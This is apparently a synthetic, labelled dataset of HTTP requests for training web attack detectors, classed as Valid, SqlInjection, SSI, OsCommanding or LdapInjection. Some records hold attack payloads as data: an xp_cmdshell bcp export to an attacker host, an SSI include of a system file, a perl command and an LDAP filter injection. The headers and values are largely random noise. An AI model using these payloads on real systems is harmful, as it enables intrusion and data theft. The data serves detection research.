User-Agent: otheOeitre (eI9Eev-d; n4a4Q8; mqiLsV8q)
UA-CPU: 68000
UA-Disp: 416,1286,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3909x9569
Via: 7.7 www.ndcua6w.tiff
Transfer-Encoding: deflate
Upgrade: esen47/9.3, o2g/8.8, eeLM/5.1
Warning: 806 www.asnRstde.jpeg "ttancree9csnUhi" 
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 97266154050
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29552
Start - Id: 41148
class: SqlInjection
GET /uwcA.fo/t6/ad5uUKiRELj@/aqY5g_yMLE/fs/CcwmaO97euc37A7rd/ha6N2oerncah/ieomeeoWea/thaesprno/one.tiff?hb=or4pn&srseeeialB=69470&ide3ntiann=ottey5iir%3Dem&shamb=mdmdem8tszd6s18&hdselh3oaoi=rnrn&4adsmdsT=p4IVMKAe8Xb&boot.iniJrPznAMFnph-passwd=478765&zrayia=exec++++xp_cmdshell+%27bcp+++%22select++++*+++++from+odioieo%22++++queryout+++pwdump.exe+++++-c+++++-Craw+++++-Shackersip++-Usa+++++-Ph8ck3r%27&tdaIutIiria=78kcJlcD&eoO1vsgqdae=kain HTTP/1.0
Host: 191.7.188.251
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 59.117.147.78
Cookie: seeAnbdri=niusdynbmItej;Hm_HJ=uh baobjectawqh;NqgWY2ZHxT=t;edNiag=tdnn>h
Cookie2: $Version="6"
Date: Thu, 24 Aug 06 22:26:35 GMT
ETag: W/"_j3_cRz2rU5i2LL_"
Expect: 100-continue
From: txaWstrh@gamw.fr
If-Modified-Since: Fri, 08 Jan 10 11:55:42 UTC
If-Unmodified-Since: Sun, 13 Sep 09 12:02:09 CET
If-Match: *
If-None-Match: "tuLP8.qr9Svp1rjn11J"
If-Range: "8zPXoHeB9Z8VOyxO"
Max-Forwards: 5035
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="boxi3is5"
Authorization: Basic ZGFnVWc6b1RhcnZp
Range: 70-3
Referer: /tmfiff/8e7veno/ywaejc/aang/ldie.htm
TE: trailers
Trailer: Date
User-Agent: bsoNnhRIst (d58gEVej; e0oYGZW; y0wwzi.; p93O8to.Nq)
UA-CPU: x86
UA-Disp: 952,1268,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 182x216
Via: io7S/1.1 8.40.168.124, FTP/2.2 www.ix9ny3ch.shtml
Transfer-Encoding: compress
Upgrade: semtwn/9.2, gite/4.2, i8ha/1.7, aln/6.6
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 57.157.7.8
X-Serial-Number: 566074493
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41148
Start - Id: 40435
class: SSI
PUT /sarkaVqTz/aleX1nmgFnDtewitwh/e6z9eSaihjonoonhd.jsp? HTTP/1.1
Content-Length: 361
Content-Language: nfb
Content-Encoding: deflate
Content-Location: /khev/tunInd/eirnored.php4
Content-MD5: ZWh5YWhsYWRtZXNzemRwTg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Dec 09 13:56:52 UTC
Last-Modified: Sun, 25 Mar 07 18:26:15 CET
Host: 83.224.163.3
Connection: keep-alive
Accept: video/*;q=0.9, text/*;q=0.6, text/plain
Accept-Charset: iso-2022-jp;q=0.5, x-mac-japanese
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: ngHn3='Ss'
Client-ip: 216.241.175.64
Cookie: bBCpo.g=%9iweion;tsosoneadttMXad=801972511;imrh=ienns0jere;7ladldsz7DothPd=873508476;8kl5jRMDz=16879354
Cookie2: $Version="80"
Date: Wed, 24 Dec 08 02:27:20 CET
ETag: W/"HCVsfrbf-RWoLeV"
From: 7UseiIn@dhxnetcel.fr
If-Modified-Since: Tue, 29 Jan 08 08:12:51 UTC
If-Unmodified-Since: Sun, 12 Mar 06 16:48:04 CET
If-Match: *
If-None-Match: *
If-Range: "d3_-lFS6vOLvn5GB"
Max-Forwards: 2475
MIME-Version: 3.6
Pragma: no-cache
Authorization: NTLM aFNmbm1lMmV0c3IydUVlNlNhbmE1bm9qZWNhNnBnZzJobGxsc2VidFc=
Referer: http://www.6njmi.com/rln88xsh/h8esjroe.png
User-Agent: hn9wjio/6.0
UA-Disp: 477,071,32
Via: 8.3 www.t16E.shtml
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~

cicbsqo=35947620&lncc=952&Bb7FCPpi45wgetx=8&derNasGc4rtLnhh=riurophp1inserte&Cssygrorm=wsnc1okju&ezbaced6v=45534&tinuucVeogome=ndq<senyinsertt$\o<h p;sc&nd=o6&sets=9&prjFSNraCdvt=sOof&txhASd=i.YJmiuM&aohhhneno5nsEeH=ti3 ieet%u86icopySposition1a=s&5orytaisybo=d8VNGl&1iEos=<!--  #include  virtual="d:\windows\autoexec.bat"   -->

End - Id: 40435
Start - Id: 43491
class: OsCommanding
GET /boyect/6RqRHO/kttxrlheO9ga9nphtaFH/xedh/Ngkllaxs9h/tRgluI-ID_l5EnxV6Hbj/ZKSFd3rrnj/srhl7yAtk1yFpRs1znp/rcr6oiiteedmPhkieQP5/lphs-UmH.bin?clAscdkh=Twnodedstenntr&GQf2ABL021G=qtpceykdeT&totfHTu4=nas&lnrniho=5895&hef2Rlnminsspt=72993498&iK0Ns_DQo=130309439&utLRbetweensP2where3yobject=nshutdown9%27nrad3+adiv&tlueNxuogz7=hYTrNH3Aaj&httpsGMom.fr=d8vbscriptrwnHlE%25uzhe&qioaqpiND=bnj&on=%2Fperl++%2Ftmp%2Fsentne.pl++++-p9342&gizAtilp5t=67&iIe=s%2Fhomeexecf&fnhLfb=2wimnt+mren&vRpmossga=sh2t HTTP/1.1
Host: 180.158.177.186
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.7, utf-8, x-mac-cyrillic;q=0.0, iso-2022-kr;q=0.1
Accept-Encoding: deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: xe=lrRrrTrw
Client-ip: 247.196.108.175
Cookie: srfeaolkg=a02gMX;slH5ud=ncvr8ehiryes;mh9c3Ue=8
Cookie2: $Version="39"
Date: Sat, 16 Jul 05 19:58:42 GMT
ETag: W/"lGLw3QTcNpilMnmU"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Thu, 08 Jan 04 08:24:29 GMT
If-Unmodified-Since: Sat, 11 Dec 04 08:15:53 GMT
If-Match: "XxbqZKSLwrfvig8"
If-None-Match: *
If-Range: "7yCZLPgOBjNDzS-j"
Max-Forwards: 6
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: NTLM c3hyaU5lc3JmeWV0dmVheW1oZXRudGhlOGNSaEVQYWd0YjdsaGdpdHNlZXMzcnFv
Range: 4-
Referer: http://thai.cz/etvna/neodjsb/rTzn9sIt/Ac5etR3e/aein.asp
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 7.6; ao-ne; rv:7.8.9) Gecko/73749132
UA-CPU: Sparc
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: HTTP/8.9 www.e6o2u4l.gif:4343
Transfer-Encoding: deflate
Upgrade: oifjE/4.1, rq7t/9.9, yvbed9/8.5
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43491
Start - Id: 16071
class: Valid
GET /nvMchodX/ijz.8X8c@Ke9.png?itjuneStee=ih+sob0%2Bcxtermn%40f%3E&tvs=rNH95M&6ldcxaenbiS=%3Aauso&ohwem=treEqEi%3E0p&t5=eIdrBy9yC.&mnstZo=8535&dpbep4=mtkacuQ&xa=dai+Hn5gh&aeidrC=l+%2F8xtermtmp%2F%28&iNicaTsMdtt8r=9&4yHxp__2usr=e%3Dese&jnd=cmUsp%2Bs%25md%5BlOom&Zl30N=xr+hbitc&04=omhjfbk HTTP/1.0
Host: 197.45.49.168
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis, iso-10646-ucs-2;q=0.1, iso-8859-3;q=0.8, euc-kr
Accept-Encoding: compress, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 63.182.13.191
Cookie: cAejTsetn=%ucnate0aebe;IMEnAW4TRllQ=nTqvWeXl
Cookie2: $Version="69"
Date: Sun, 01 Aug 04 24:47:21 CET
ETag: "rNPQqSBe3adujrY"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Sat, 16 Aug 08 03:03:28 CET
If-Unmodified-Since: Thu, 27 Dec 07 16:44:46 UTC
If-Match: *
If-None-Match: "gG84QcvOTMEatgjvgT"
If-Range: *
Max-Forwards: 8
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: ksnrer Iwiy7esm=Ttetwene
Authorization: Digest cnonce="8mEb23iy"
Range: -84,27-038,192411-63468
Referer: http://www.hnocf.com/5Lset/er8oigon.fgf
TE: deflate,trailers,deflate
Trailer: Via
User-Agent: Mozilla/5.3 (Windows; U; Win98 7.2; ru-mo; rv:2.4.5) Gecko/02269199
UA-CPU: x86
UA-Disp: 489,939,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 973x791
Via: olT6bm/8.0 www.ejdmdooD.htm:03726
Transfer-Encoding: gzip
Upgrade: e0aek/2.5, nsh/9.2, iYce/9.7, rnSre/1.5, oat/7.7
Warning: 143 75.253.104.203 "yotde2operezehhhize" 
X-Forwarded-For: 10.132.59.91
X-Serial-Number: 6495346475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16071
Start - Id: 4476
class: Valid
PUT /rlLHc/turi2etjcanot/ysrnpet5hTrafrPztcE/eVKZ_q1gNavB/tqMq9Xio/w2tB8KgJU61v/e8iT/rnoeuysI0e7esdlr/4eoK--.php3? HTTP/1.1
Content-Length: 243
Content-Language: Atac0,uaauedee,07hee
Content-Encoding: gzip
Content-Location: /wxEoc/orosrir/rn95ee.html
Content-MD5: bG4xZWNpb2VheXl5Mmhmcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Sep 07 21:50:15 CET
Last-Modified: Mon, 07 Dec 09 18:19:57 GMT
Host: 9.150.100.236
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-950;q=0.9, iso-8859-3, iso-8859-8, iso-8859-7
Accept-Encoding: deflate, gzip;q=0.2, compress, compress, identity;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 157.6.94.128
Cookie: cgsnno=245904959;ssi=60748660;hoFyt=0268647;oien=018178
Cookie2: $Version="357"
Date: Fri, 20 Aug 04 19:57:47 UTC
ETag: "T1Np.U00Gp9bgT5HkM7R"
Expect: 100-continue
From: eneiwbe@rqreia1soo.ch
If-Modified-Since: Tue, 17 Nov 09 11:48:41 UTC
If-Unmodified-Since: Wed, 14 Dec 05 05:14:52 GMT
If-Match: "Yfk2w35o26ultZxE"
If-None-Match: "qS8WNjJs45g7x.ICL5"
If-Range: *
Max-Forwards: 535
MIME-Version: 8.8
Pragma: brRo=Sft93
Proxy-Authorization: Basic aW5qdnVwdXI6bzFTcHB6TQ==
Authorization: NTLM azVUaTc5dmY4c2xnblJlb3BubjVFeHJ0c2lyZG9hSDdvdHdvc3Jl
Range: 47-43864,-075,-7838
Referer: /4fsadnt/Hhaenhdw/rmtwEaas/eUnv6/rchg.exe
TE: trailers,gzip
Trailer: Accept
User-Agent: rLUu/8.8.8.1.7
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 421x3151
Via: HTTP/9.1 www.neIllf.shtml:8, 9.8 www.ebaohoTi.gif
Transfer-Encoding: identity
Upgrade: Ncnd/9.0, sne/9.0, e0cb/3.5, la4/2.0, sjR/3.7
Warning: 512 233.21.168.235 "8w0fheinetpez" "Sun, 23 Jan 05 24:46:33 GMT"
X-Forwarded-For: 108.74.212.152
X-Serial-Number: 944553276
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gr=hne&aix5tfo=sdivAa=oa&$Ao6a3dlhaving&systemQ8Z_l.5CW=u:amna]mdse nl4zNvbscript&ep53gne=i3XrLGH@A&coea6Ap=nodeHu&8h=53963442&ph=sDrcCit&64=0731517&e5C=0ca u yhomeoGid-olibu&lwdjo5hen=1349953&xE4eehn=i$Hstft8&C8zuXO_epcopy=aV2BN

End - Id: 4476
Start - Id: 19716
class: Valid
GET /MFv3Iid0wM6EM9Y/tWidje/u8nixK4SS5kLEr1XNI/m7dO9dWzv4fDTOit/RAgpasswd@IA/k0Xy4lLho/3tCk/ehWXQY7Fx7u5/zinUEivETN/6e/whereOgW5HSW.jpeg?y6wPP2=33&iohddhh=246787&xbhto8tunMg=fzk579ixhy&1sMseTr=598821&gcnaZ=759220&wrKtepihateTii3=047&orEu2img_Ici=y6LddNC_RORc&@L3lahB9=737&otkmT=5jMdq-fbq4_4&sigbxfwn=cZvfpnS&zmfateoe8epuEt=sMXCYevEl&iweeroza=5348667&si1m=na%3E+Za&aoFoN=sqssdi&he3Q-K=618 HTTP/1.0
Host: www.et3ni.be:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-cyrillic;q=0.6, cp-936;q=0.3, x-mac-chinesesimp, euc-tw;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 184.121.99.71
Cookie: PjigrrL5=9;cn7=ettjB;yr1=5536789;foatz=7351434;io=ocB
Cookie2: $Version="61"
Date: Fri, 07 Oct 05 12:30:17 GMT
ETag: W/"1PO2JJfhSUOkitkfTR"
Expect: eahee
From: moea@estmzx.uk
If-Modified-Since: Tue, 30 May 06 10:54:07 UTC
If-Unmodified-Since: Thu, 22 Sep 05 17:03:45 CET
If-Match: "O9CH-LBrl7DtdWdlUEt"
If-None-Match: *
If-Range: "vxL80xOy6GBjGtCTPO5k"
Max-Forwards: 73
MIME-Version: 5.3
Pragma: tn1=bpgWR
Proxy-Authorization: Basic cm1pZWF5cHI6dG5Fb3pzcw==
Authorization: srYn weuaaas=pnoYtea
Range: 521-871
Referer: http://www.h9yo.ch/3arnb.gz
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/8.1 (compatible; poT6ttn; Open BSD i586; fbiNo; rcoxt; dairei)
UA-CPU: PowerPC
UA-Disp: 2543,113,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 428x5679
Via: HTTP/4.3 80.80.150.179, 0.9 www.vuebq.js, FTP/9.5 118.60.207.78
Transfer-Encoding: rJc3L
Upgrade: 2eglrr/4.5, A52ic/9.9, ntnlr/5.9, lahWl/8.7
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 209.213.51.4
X-Serial-Number: 7592797493312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19716
Start - Id: 38168
class: LdapInjection
GET /eeihwuexxhenreaP/hh0niTaFhoNo/3vrMl-5LFVVt/poruIRN4lservicesh/6z91YuH@EFj7F7VT6i_G/retSanhlyoJ2aj0fots/lu/t1VUTmTZJbDxvkvOgg@o/4DraE1rehesapi6z/slXkGQ@tFWGvmiDmlL7/Truni/pLY3iL5If.jsp?auhEacrotkenkii=tiwsh%29%28%7C++%28raot%3D*%29&WrsSiastopTeth9=518 HTTP/1.0
Host: www.cd4nbbol.fr
Connection: close
Accept: image/*;q=0.9
Accept-Charset: windows-1252, x-mac-hebrew;q=0.1, euc-jp;q=0.0, cp-932;q=0.3, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 122.205.56.130
Cookie: 5sisi=ehb0;anxntirNuoh=3961008128;5-ycosaccess_logG1T4=rq r~;AcLztn1aghhgpde=mnheanwYnehYutw;hhdy6te=sz0@J3FXlju3;Ttn=rmornrmo
Cookie2: $Version="5"
Date: Wed, 09 May 07 01:11:02 GMT
ETag: W/"I4g._rkzJPtJSclIRTr"
Expect: itgdtcl=icezz
From: b63ter3o@6adqse.net
If-Modified-Since: Fri, 09 Nov 07 06:09:34 GMT
If-Unmodified-Since: Tue, 16 May 06 10:59:16 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Apr 07 05:00:35 GMT
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: Digest response="FccE9222AAefC7fBdF4E41fc40E562cd"
Range: -58269,-622
Referer: http://uNlosbe.ch/eti9t4u.html
TE: deflate
Trailer: Via
User-Agent: Mozilla/4.5 (Windows; U; Windows NT 3.7; se-vn; rv:4.4.1) Gecko/47861339
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: 5.8 17.83.235.142, 3.2 117.87.41.173, FTP/1.8 174.112.172.23
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 105.91.132.113
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38168
Start - Id: 13943
class: Valid
GET /odA.php3? HTTP/1.0
Host: 208.81.29.189
Connection: close
Accept: */*
Accept-Charset: iso-8859-3;q=0.2, x-mac-chinesesimp, iso-8859-4;q=0.4, euc-cn
Accept-Encoding: *
Accept-Language: gc-sdemt;q=0.5, 5aeYe-5sr0g0R, we-dlo
Cache-Control: no-store
Client-ip: 107.19.75.92
Cookie: setyaxeitktrl=799000;n0cosUnesjin7Od=ceiislhsnnrlA;uhutaoosralbsze=da3systemcmdstoll;aCPleeeOtlsjt=geSehzrN:ie?|d ;liwi=vbscript7l;c
Cookie2: $Version="03"
Date: Fri, 29 Sep 06 09:20:23 GMT
ETag: W/"uc3AZU3AIgMsfoMc"
Expect: 100-continue
From: rn6Njecb@1xoroo.st
If-Modified-Since: Thu, 17 Feb 05 18:48:26 GMT
If-Unmodified-Since: Fri, 04 May 07 23:50:02 UTC
If-Match: *
If-None-Match: "SLP4OWBvyzBZ4xrfFX"
If-Range: *
Max-Forwards: 84
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic ZTZzcmVzUm86aGFld2VJbWw=
Authorization: Digest algorithm=MD5-sess
Range: 4-17952,40583-6085
Referer: /dxny.pl
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/7.5 (compatible; MSIE 3.5; SunOS sun4u; bHttnza; rm2gfrsoU; oogscruias)
UA-CPU: x86
UA-Disp: 7939,4903,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7780x7588
Via: 1.1 211.95.247.78:208, gfmA9/8.4 www.giRataoe.gif
Transfer-Encoding: identity
Upgrade: erdscE/5.2, 4oa/1.0
Warning: 669 www.eavortz.js "DSa8rfspiemkwse7" "Sun, 22 Feb 09 17:32:26 UTC"
X-Forwarded-For: 222.27.179.251
X-Serial-Number: 5967398849780
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13943
Start - Id: 22489
class: Valid
GET /tVhJN_sLi_xl9tm9@/e-qfZ9j/ookmhei/tmpO@%u@inputAZGcatzPy/tdroren/tum7et/aAuantl4e.htm?daitel5mFtm=%3BEIfromimel0a+bintorene&esipy1riOkhs=1998&tunoaSbIoorte=dmayrorhetWsemlt&fwfeschin=Cua6tcev&6VC.KNIq_s=7mridaaGddwriteeoe&tafa4nTr5Dastn=m%3Btrhcl&execcXM=rZOfjienmLosadla&tT=2en&eNsntfttipgga=%3Dne0wo&tatAfsi=335793&cNIo51Eeeslwn=zu3b&teMdryem=t%3Bn&llUnsebh=eUxvQ&echo2passthru6Ysv7P=zfS&oeleksAh2h4=nrbq2b HTTP/1.1
Host: www.oetnea.biz:80
Connection: paemtc
Accept: */*
Accept-Charset: windows-1250;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 91.169.96.2
Cookie: qpStsios=xehya:ae ]ee;e65aet=iO@c:
Cookie2: $Version="99"
Date: Mon, 29 Mar 04 07:10:15 UTC
ETag: "0L3VVuwSV2QUPsGqj-AH"
Expect: 100-continue
From: oh5chbe@53nslitm.fr
If-Modified-Since: Sat, 31 Oct 09 20:44:47 CET
If-Unmodified-Since: Wed, 14 Feb 07 07:22:43 CET
If-Match: *
If-None-Match: "gCXxKKhZZ@sfQ7Vac"
If-Range: Fri, 18 Jul 08 06:23:38 UTC
Max-Forwards: 6099
MIME-Version: 9.5
Pragma: ttioyaEa='jnEloM'
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: Basic OXNsZHRpN246b1RzczZk
Range: 625-,292-,328-8
Referer: http://www.najty.net/tdlsorm/edata/rooatsrr.pl
TE: chunked;q=0.0
Trailer: Accept
User-Agent: iltvtay
UA-CPU: MIPS
UA-Disp: 392,629,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1822x173
Via: 8.6 www.yseg.js:40492, 9.6 39.234.227.226
Transfer-Encoding: lrnalh
Upgrade: leaHT/8.3, sdhsou/7.9, acol/9.0, ikfFc/4.1, 61ealm/2.2
Warning: 961 220.137.188.64 "ttelss1" 
X-Forwarded-For: 30.145.163.171
X-Serial-Number: 039607543523692189
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22489
Start - Id: 14859
class: Valid
GET /heOsz9i@ogJ-oj9xX.htm?NifaBnet6iue2r=aP.nC.r9iOU&EDbinnclJ6=19089&r9bmseah=5bis HTTP/1.0
Host: 192.100.28.89
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=3646
Client-ip: 138.69.215.50
Cookie: L9rfsrzElioi2a=opasswd;qXX@gF=rbetlel;svdhoin=passwddropbph;td0auvwotwE8=489362047
Cookie2: $Version="63"
Date: Fri, 23 Jul 04 01:43:52 UTC
ETag: W/"7Ww2LqRBAnXCQUCD93"
Expect: 100-continue
From: doomanl@8w3rc.it
If-Modified-Since: Tue, 11 May 04 02:02:59 UTC
If-Unmodified-Since: Wed, 15 Nov 06 19:18:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: NTLM d25hMmVobmtyZHRGb2F0bnVvbGNkY3ZhbWNlQ284dGVpdA==
Range: -43,-61335,692292-223
Referer: http://www.odcnr.cz/dota/rdm5.rar
TE: chunked;q=0.4,gzip;q=0.1
Trailer: Referer
User-Agent: Mozilla/2.1 (Windows; U; WinNT 3.1; rI-ao; rv:5.9.6) Gecko/45378402
UA-CPU: 68000
UA-Disp: 872,888,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: eGa2/0.8 88.77.140.12, HTTP/2.1 www.Yfobb.jpg, 5.9 www.hste.html
Transfer-Encoding: compress
Upgrade: orhoc/2.2, Sguidv/0.2, 9Hz/1.4, Qxua/9.4
Warning: 213 236.96.3.168:19736 "nptdunamnns7" "Fri, 30 Jun 06 14:46:01 CET"
X-Forwarded-For: 175.103.200.117
X-Serial-Number: 883982110
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 14859
Start - Id: 27339
class: Valid
GET /bLP.php3?yriod=tUxR.25M9Tur&die4ehaltdoes5w=906&Zgysn=%3Csitwinnt%5Bmemnc&klviufdlueieao=aE7se&naaHOefaurCnem=o0af8Ed&Qhtpassautoexec8y=tmfdexsoIlrr3sitn&ztbmRh5lAmfg=oDemoeb&@B2t_slW=r+scTcawwhereeEi%7C&9ausrytpa=eiahnfIenhtpasso1&bnutqrtetl8snug=3&ehsad=4z&ggai=uxh&srtokae9m6w=75eubrnnonL0tiudA HTTP/1.1
Host: 15.249.35.153:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 158.76.53.178
Cookie: Eiw=456069;eudtsrt=etea
Cookie2: $Version="5"
Date: Sun, 26 Jun 05 24:02:39 UTC
ETag: "1miNIizWdS3oANro"
Expect: miA5rrrN=sefaeot;oiihka2m
From: aNo7@oOgoesyt.de
If-Modified-Since: Thu, 11 Feb 10 21:28:15 GMT
If-Unmodified-Since: Sat, 11 Oct 08 02:28:23 UTC
If-Match: *
If-None-Match: "sCk1XdfHiWaxYFut"
If-Range: Sun, 19 Feb 06 24:25:03 CET
Max-Forwards: 3258
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest nc=a9cB8b28
Authorization: Digest response="0BfcF1A50BCa10BC884aF1cBBDbC634a"
Range: 5136-,-1,40-
Referer: http://Ptbdr.be/hi3s/oantt/ssta/tjiuo/sn59ao.gif
TE: gzip;q=0.1
Trailer: Max-Forwards
User-Agent: Mozilla/2.0 (Windows; U; Win98 1.8; kj-au; rv:9.4.3) Gecko/28387766
UA-CPU: 68000
UA-Disp: 3109,349,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3599x969
Via: anyz/6.0 48.197.114.79
Transfer-Encoding: compress
Upgrade: oygdhG/5.2, mkl/7.7, atrtbx/4.3, rRu4lt/4.7
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27339
Start - Id: 5569
class: Valid
POST /sgHVtoV.MLX_Nz/ei/nUl.asp? HTTP/1.1
Content-Length: 143
Content-Language: asubP,nata
Content-Encoding: deflate
Content-Location: /pc0D.asp
Content-MD5: c2FwZWFkRG5tdGVsYThjYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Nov 05 13:23:32 GMT
Last-Modified: Sat, 03 Jan 04 10:18:37 CET
Host: 142.25.138.242:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ezfTo-dtBo, seteooT-keir, 5y-enafn;q=0.0
Cache-Control: no-store
Client-ip: 162.107.11.157
Cookie: aopdxcshnmTu=isdechieeetp;Azdthp=423892;4r9M614jH=as2X;nreRh6nn=uI;eec=018
Cookie2: $Version="811"
Date: Wed, 02 Feb 05 04:55:51 GMT
ETag: "9XN.dYXVv97zHjhTbu"
Expect: 100-continue
From: ddE5mq0u@tano2i.be
If-Modified-Since: Wed, 08 Aug 07 03:08:33 UTC
If-Unmodified-Since: Thu, 17 Jan 08 05:11:15 CET
If-Match: "KlcqpPxg59s5fCY"
If-None-Match: *
If-Range: Mon, 24 Aug 09 10:36:33 GMT
Max-Forwards: 5023
MIME-Version: 8.0
Pragma: qtgnd='tirDeiI'
Proxy-Authorization: Digest realm
Authorization: Digest response="d38B9cBcF3f05A60Cf9CbD2a17AcDfD4"
Range: -97243,-59
Referer: http://7Nnn8rut.fr/hejoze/3ahobmEe/hypcr.jpg
TE: deflate
Trailer: Referer
User-Agent: oerceXtapS3AjwrC
UA-CPU: x86
UA-Disp: 266,600,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6340x801
Via: HTTP/3.7 255.69.246.147, 9.6 159.62.161.17, 3.1 www.Typlho.htm
Transfer-Encoding: identity
Upgrade: 4rlr/0.3, gsobha/3.9, R5tyi8/0.2
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 26.9.191.248
X-Serial-Number: 07654558799930280172
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

tsolashterrs=294&zwhere0aZreplacepsEocK=epst=e2etinted6ene&tfors=rbinssp&7Bnn=70809&all.9_=gisife&Tcmw9Il=114&iEe=rd3w&rumaeetlupovc=taee355z

End - Id: 5569
Start - Id: 10989
class: Valid
GET /6attahnen7enoj6qb4n/sUcU5PkWjn1VNcm3ZS/sa/HIhY6libh.iDlnp/n@@85xJK3xmFceayvDB/tyNrsepfclAjR1dU/of0BLJll35/veneblehwtpaumn/sfv@hMutl50lpxgjYd/0aDediv8@16/leaab.gif?gxmlxtermehD6d=92&soethegtB=a6yiw8enget&paceTL8we=tmsonS%5D3oicF&eG=ihjsadhmvee HTTP/1.1
Host: www.ktiin1ao.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=8691
Client-ip: 174.60.171.41
Cookie: phyhesm=entqsUren;fne5l8=na
Cookie2: $Version="75"
Date: Wed, 20 Dec 06 03:49:27 UTC
ETag: "l3Um3FuC_D3@Yj0mc"
Expect: clhiat
From: Oimrip@itut.fr
If-Modified-Since: Fri, 23 May 08 12:05:54 UTC
If-Unmodified-Since: Mon, 09 Jan 06 16:46:38 CET
If-Match: "4SQj9-fWtk3.kD8Los5"
